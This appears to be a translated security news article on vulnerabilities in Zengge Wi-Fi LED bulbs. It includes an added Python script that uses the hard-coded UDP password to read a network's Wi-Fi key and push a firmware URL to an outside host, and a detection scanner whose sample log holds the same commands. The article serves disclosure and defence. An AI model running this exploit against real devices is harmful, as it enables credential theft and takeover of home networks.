IoT security: multiple security vulnerabilities in Wi-Fi LED lights
A security researcher abroad recently found multiple security vulnerabilities in Zengge's Wi-Fi LED bulbs.
ZENGGE is a technology company covering LED controller R&D, manufacturing, sales, engineering design, installation and service.
Wi-Fi LED bulbs are LED bulbs that connect over Wi-Fi. As the findings below show, such a bulb can be turned into a router, an HTTP server, an HTTP proxy and several other kinds of device.
Working Principle
The bulb is controlled from an Android application. It can join the user's network and be controlled locally or remotely over the Internet; Internet control is disabled by default, which limits exposure. The bulb listens on three ports: TCP port 80, TCP port 5577 and UDP port 48899. Port 80 serves a (broken) web page, port 5577 controls the bulb, and port 48899 manages the Wi-Fi module itself.
The module port allows almost any operation: reflashing the firmware, acting as a proxy, reading the Wi-Fi password and joining a different network. It is normally reachable only from the local network. Commands on this port are AT commands: the string "AT+" followed by the command name and optional parameters.
The bulb's control protocol is unencrypted, but because a user's access only covers controlling the light, the impact of that alone was judged to be minor.
Local Network Attacks
An attacker on the same network can send the hard-coded password HF-A11ASSISTHREAD in a UDP packet to port 48899 and then issue AT commands to the module.
The firmware can be reflashed with AT+UPURL:
AT+UPURL=url,filename makes the module download and install the file at the given URL. The Wi-Fi name and password can be read with AT+WSSSID and AT+WSKEY.
The AT+HTTPDT command and the related HTTP commands make the bulb issue HTTP requests chosen by the attacker from inside the network, behind the firewall and NAT, so the bulb acts as an HTTP proxy.
An attacker on the same network can also use the bulb to obtain the right to use its remote-control function. This is a different issue from the "Internet remote control" vulnerability below: once an attacker knows the bulb's MAC address, that access cannot be revoked.
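The exchange described above (discovery with the hard-coded password, then AT+WSSSID, AT+WSKEY and AT+UPURL over UDP 48899) as an added, runnable example; this is not code from the original article or from Zengge. Only the port number, the password HF-A11ASSISTHREAD, the command names and the ACCF23 MAC prefix come from the article. The exact wire format (a discovery reply of "ip,mac,hostname", a bare "+ok" to enter command mode, "+ok=value" and "+ERR=code" answers, CR-terminated commands) is an assumption, and the mock module that answers on localhost is entirely constructed so the exchange runs offline.

```python
"""Simulated UDP 48899 management exchange (added example, constructed mock device)."""
import socket
import threading

DISCOVERY_PASSWORD = "HF-A11ASSISTHREAD"   # hard-coded password from the article
MODULE_PORT = 48899                        # real module port; the mock uses an ephemeral localhost port

# Constructed mock device state, not data from a real bulb.
MOCK_STATE = {"ip": "192.168.1.50", "mac": "ACCF23112233",
              "ssid": "HomeNet", "key": "s3cret-wifi-pass"}


def mock_module(sock, state, stop):
    """Stand-in for the Wi-Fi module's UDP 48899 handler (assumed wire format)."""
    sock.settimeout(0.2)
    in_cmd_mode = False
    while not stop.is_set():
        try:
            data, peer = sock.recvfrom(1024)
        except socket.timeout:
            continue
        msg = data.decode("ascii", "replace").strip()
        if msg == DISCOVERY_PASSWORD:
            # Discovery: answer with IP, MAC and a module name (assumed layout).
            sock.sendto(f"{state['ip']},{state['mac']},bulb-module".encode(), peer)
        elif msg == "+ok":
            in_cmd_mode = True                     # assumed: acknowledged silently
        elif in_cmd_mode and msg.upper() == "AT+WSSSID":
            sock.sendto(f"+ok={state['ssid']}\r\n".encode(), peer)
        elif in_cmd_mode and msg.upper() == "AT+WSKEY":
            # Assumed reply layout: auth,cipher,key
            sock.sendto(f"+ok=WPA2PSK,AES,{state['key']}\r\n".encode(), peer)
        elif in_cmd_mode:
            sock.sendto(b"+ERR=-1\r\n", peer)      # mock refuses everything else, e.g. AT+UPURL


def discover(sock, target):
    """Send the hard-coded password and parse the 'ip,mac,hostname' reply."""
    sock.sendto(DISCOVERY_PASSWORD.encode("ascii"), target)
    reply, _ = sock.recvfrom(1024)
    ip, mac, host = reply.decode("ascii").strip().split(",")
    return {"ip": ip, "mac": mac.upper(), "host": host}


def at_command(sock, target, cmd):
    """Send one AT command; return the text after '+ok=' or raise on an error reply."""
    sock.sendto((cmd + "\r").encode("ascii"), target)
    reply, _ = sock.recvfrom(1024)
    text = reply.decode("ascii").strip()
    if not text.startswith("+ok"):
        raise RuntimeError(f"{cmd} rejected: {text}")
    return text[4:] if text.startswith("+ok=") else ""


def run_local_attack(target=None):
    """Discover the module, read SSID and Wi-Fi key, and try a firmware replacement.

    With target=None the constructed mock module is started on localhost so the
    exchange runs offline; pass (ip, MODULE_PORT) to talk to a real module.
    """
    stop = threading.Event()
    if target is None:
        srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        srv.bind(("127.0.0.1", 0))
        target = srv.getsockname()
        threading.Thread(target=mock_module, args=(srv, MOCK_STATE, stop), daemon=True).start()
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.settimeout(2.0)
    try:
        info = discover(client, target)
        info["zengge_oui"] = info["mac"].startswith("ACCF23")   # prefix noted in the article
        client.sendto(b"+ok", target)                           # enter command mode (assumed)
        info["ssid"] = at_command(client, target, "AT+WSSSID")
        info["key"] = at_command(client, target, "AT+WSKEY").split(",")[-1]
        try:
            # Firmware replacement: the mock refuses it; a real module would fetch the URL.
            at_command(client, target, "AT+UPURL=http://203.0.113.5/fw.bin,fw.bin")
            info["upurl"] = "accepted"
        except RuntimeError as exc:
            info["upurl"] = str(exc)
        return info
    finally:
        client.close()
        stop.set()


if __name__ == "__main__":
    print(run_local_attack())
```

The point of the mock is the shape of the exchange: one UDP datagram containing a fixed string is the entire "authentication", after which the SSID and pre-shared key come back in clear text and a firmware URL is accepted without any signature check. A real module would not refuse AT+UPURL the way the mock does.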
Wi-Fi attack
When a bulb in STA mode fails to connect to its access point, the AT+MDCH setting controls whether it falls back to wireless AP mode. AT+MDCH has the following options:
1、off
2、on – 1 minute
3、auto – 10 minutes
4、3-120 – minutes before the reset
In most cases (unless configured otherwise), since AP mode is enabled by default, an attacker within radio range can connect to the bulb's own access point and carry out any of the local attacks above.
Risks exposed to the Internet
Scanning the Internet for these bulbs found at least two management ports exposed. If a bulb is reachable from the Internet, an attacker anywhere can use it as a proxy into the user's network. They can also read the MAC address of the user's router from the bulb and look it up in the WiGLE database to physically locate the user, then use the recovered wireless name and password to join the same access point as the bulb, or reflash the firmware to mount further attacks.
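For the defensive side of the two sections above, here is an added detection example (not from the article or any vendor): it scans connection records for traffic to UDP port 48899, flags the hard-coded discovery password and the AT commands the article names, and escalates anything that arrives from outside the RFC 1918 ranges, since the management port should never be reachable from the Internet. The "key=value" record format and the sample lines are constructed assumptions; adapt parse_record() to your own sensor's output.

```python
"""Detection over constructed connection records for the UDP 48899 module port (added example)."""
import ipaddress
import re

MODULE_PORT = 48899
DISCOVERY_PASSWORD = "HF-A11ASSISTHREAD"
# AT commands named in the article, each with a severity chosen here.
RISKY_COMMANDS = {
    "AT+UPURL": "critical",   # firmware replacement
    "AT+WSKEY": "high",       # Wi-Fi key disclosure
    "AT+HTTPDT": "high",      # bulb used as HTTP proxy
    "AT+WSSSID": "medium",    # SSID disclosure
    "AT+MDCH": "medium",      # fall back to AP mode
}
AT_RE = re.compile(r"AT\+[A-Z]+", re.IGNORECASE)
# "Local" means RFC 1918 here; ipaddress.is_private also covers documentation ranges, so be explicit.
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample records (assumed key=value layout; payload is last so it may contain spaces).
SAMPLE_LOG = """\
ts=1 proto=udp src=192.168.1.20 dst=192.168.1.50 dport=48899 payload=HF-A11ASSISTHREAD
ts=2 proto=udp src=192.168.1.20 dst=192.168.1.50 dport=48899 payload=AT+WSKEY
ts=3 proto=tcp src=192.168.1.20 dst=192.168.1.50 dport=5577 payload=71230fa3
ts=4 proto=udp src=198.51.100.7 dst=203.0.113.9 dport=48899 payload=HF-A11ASSISTHREAD
ts=5 proto=udp src=198.51.100.7 dst=203.0.113.9 dport=48899 payload=AT+UPURL=http://198.51.100.7/fw.bin,fw.bin
ts=6 proto=udp src=192.168.1.21 dst=192.168.1.255 dport=1900 payload=M-SEARCH
"""


def parse_record(line):
    """Parse one 'key=value ...' record; everything after 'payload=' is the payload."""
    head, _, payload = line.partition(" payload=")
    fields = dict(kv.split("=", 1) for kv in head.split())
    fields["payload"] = payload
    fields["dport"] = int(fields["dport"])
    return fields


def is_local(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def classify(rec):
    """Return (severity, reason) for a record, or None if it is not of interest."""
    if rec["proto"] != "udp" or rec["dport"] != MODULE_PORT:
        return None
    payload = rec["payload"]
    if payload.strip() == DISCOVERY_PASSWORD:
        sev, reason = "medium", "module discovery with hard-coded password"
    else:
        m = AT_RE.match(payload)
        cmd = m.group(0).upper() if m else None
        if cmd in RISKY_COMMANDS:
            sev, reason = RISKY_COMMANDS[cmd], f"{cmd} sent to module port"
        elif cmd:
            sev, reason = "low", f"{cmd} sent to module port"
        else:
            sev, reason = "low", "unrecognised traffic to module port"
    if not is_local(rec["src"]):
        # Management port reached from the Internet: the exposure the article warns about.
        sev, reason = "critical", reason + " from Internet source"
    return sev, reason


def scan(log_text):
    """Run classify() over every record and return the list of alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        result = classify(rec)
        if result:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "dst": rec["dst"],
                           "severity": result[0], "reason": result[1]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The RFC 1918 check is deliberate: Python's ipaddress.is_private also returns True for the documentation ranges used in the sample, which would silently hide the Internet-sourced records.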
Remote control of Internet attacks
The bulb's remote-control function has no authentication. If a bulb is set to accept commands from the Internet, anyone who knows its MAC address can control it.
Bulb MAC addresses share the prefix ACCF23, and the last three bytes identify the individual device. Because addresses are assigned sequentially, an attacker who has learned one MAC address can narrow the scan range considerably, so it takes little time to find and control bulbs that have remote control enabled.
By contrast, the article notes, Hue bulbs use the source IP address to identify devices, which prevents this kind of attack.
Indirect Connection attack
Looking at the remote settings on a phone that has been paired with a bulb shows the bulb's authorized-device list, i.e. every device that has been granted access; the API call behind it is GetAuthUserDevice. The problem: an attacker can take device IDs from this authorization list and use them to control other bulbs.
Solution
Zengge first tried to fix these issues by obfuscating keys, which did not work. The company later released a new version that changed the device registration process and added a server-side verification step; however, that server-side verification was still not enabled.